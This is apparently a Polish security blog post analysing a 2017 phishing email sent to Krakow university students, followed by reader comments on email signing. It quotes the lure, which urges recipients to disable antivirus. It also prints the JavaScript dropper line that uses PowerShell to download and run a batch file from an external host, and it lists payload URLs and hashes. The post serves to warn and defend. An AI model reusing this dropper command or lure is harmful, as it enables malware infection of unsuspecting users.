13/2/2017
Od jednego z czytelników otrzymaliśmy treść wiadomości jaka została dziś rozesłana do bliżej niesprecyzowanej grupy osób (wiemy o ofierze z Uniwersytetu Rolniczego w Krakowie). Poniżej publikujemy treść fałszywej wiadomości:
Subject: Przypomnienie!! – weryfikacja danych na liście studentów
From: Dziekanat dziekanat.kierownik@opoczta.pl
To: dziekanat.kierownik@opoczta.pl dziekanat.kierownik@opoczta.pl
Date: Sat, 11 Feb 2017Szanowni Państwo,
większość z Państwa jeszcze tego nie zrobiła, więc jeszcze raz proszę o sprawdzenie i zweryfikowanie swoich danych wpisanych na listę studentów na rok akademicki 2016/2017. W przypadku niezgodności danych z rzeczywistością proszę o ich korektę. Poniżej załączam link do pobrania listy studentów z uczelnianego serwera.
Pobierz listę
Jako, że jest to program wczytujący dane z przeglądarki może zostać potraktowany przez niektóre programy antywirusowe jako zagrożenie, należy wtedy dezaktywować program na czas działania programu.
Jeśli pliku nie uda się otworzyć pomimo tego, oznacza to, że Państwa e-mail na który są Państwo zalogowani w przeglądarce nie pasują do żadnego wymienionego na liście, a w związku z tym problem Państwa nie dotyczy.
Jak widzicie, socjotechnika na “najwyższym poziomie” ;-) Słowa “Pobierz listę” są podlinkowane do następującego URL:
hxxps://www.dropbox.com/s/tl1y6f1iqtylq4d/2050e03ca119580f74cca14cc6e97462.js?dl=1
z którego pobierany jest plik .js o nazwie:
2050e03ca119580f74cca14cc6e97462.js
MD5 a76464cd01561e11a835236b7590ead5
SHA1 04a7cb33b9a56d5da2d601448cc2aa03f62c7b82
Plik jest rozpoznawany przez 6/54 antywirusy i zawiera następującą instrukcję:
var d=new ActiveXObject('Shell.KEYLGApplication'.replace('KEYLG',''));d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('LINK','Desktop.bat');Start-Process 'Desktop.bat'","","",0);
LINK to następujący URL:
hxxp://downloadfilenow.website/gateway.php?
download=ZjM5NjVmNDg4MTk5ZGNlMjU1MjUyZTE2YzZj
NGE4ZTU4NWVhMTQyNzQ_YzUwZWQ5NjQ3OGU1ZjVlMjg2M
mIxMGVhOTk_ZTMwYjMyYzRlMjkyOGUyMzFlNTIxZDg5ZW
U1ZTljODAwZThlN2Q4NGVjOWQ2M2M2OGI_YTExOWU1ZTd
mYzZjZGIzNzM4NzM1NDgyM2E3MTdkZDA2MWI3NWUwMzM5
NGRlN2FhMTljZTM_NDg4MDc_NDM1YjlkZjc3Y2Zj
który pobiera trojana, wykrywanego przez 9/55 antywirusów:
2050e03ca119580f74cca14cc6e97462.exe
MD5 e41d2dc76e16fdc6ea1e8cd753a77f85
SHA1 13e469d1d2c1fbb1211489e0449b964ffb0f5f89
Po uruchomieniu, malware dociąga kolejną binarkę:
hxxp://mypanel.website/panel/admin/download/pwd.exe
MD5 f6421a4f570656ada4a6c953bdd3c342
SHA1 6571ad4133ca7425d2cfb4d36c65f7aebe13ed94
Ta jest już doskonale znana antywirusom od 2016 roku.
Atak wygląda na dość mocno sprofilowany, ale niezaawansowany, zbudowany w oparciu o gotowe narzędzia. Jeśli ktoś z Was był odbiorcą niniejszego e-maila, dajcie nam znać. Z chęcią dowiemy się kto poza studentami Uniwersytetu Rolniczego w Krakowie znajdował się w grupie odbiorców niniejszej wiadomości.
U nas by taki numer nie przeszedł, wszystkie listy są co najwyżej wywieszane na tablicy przy dziekanacie. Pozdrawiam z pierwszego wydziału w rankingu perspektyw IT 2016 ;)
Low-tech approach to security ? Szanuję :)
@Denat. Czasami dobrze być zacofanym ;).
Czasami dobrze mieć Eresa :)
Ściślej: listy wiszą przy nieczynnych w zimie schodach za gabinetem dziekana ds. nauczania :)
Wydział Informatyki Stosowanej UJ ??
@Denat, szewc bez butów chodzi. ;)
Jak znam studentów, to większość się nabierze.
Grubymi nićmi szyte, ale plus za poprawność językową. Akurat na poziomie dziekanatowym.
Nie wystarczyłoby, żeby podpisywali maile GnuPG?
https://xkcd.com/1181/
Musiałem.
To Microsoft zaczął dodawać do Outlooka GnupG? Nie wiedziałem… xD
W Androidzie, w googlowym kliencie IMAP i większości innych też GnuPG nie odpalisz, wyjątkiem jest chyba tylko K9Mail.
Reasumując, nawet jeśli jakiś student wie o istnieniu GnuPG (co już jest dosyć rzadkim zjawiskiem), to i tak nie ma zbyt wielu okazji, żeby taki podpis zweryfikować.
To by było na tyle
Standardem jest S/MIME, teraz w O365 można podpisywać/szyfrować pocztę nawet w webmailu :)
Różnica między standardem S/MIME a PGP i pochodnymi jest fundamentalna, bo standard korzysta z kryptografii poświadczanej przez zaufane CA, a PGP i pochodne działają z kluczem “własnym” podpisującego, bez uwierzytelniania na poziomie osoby.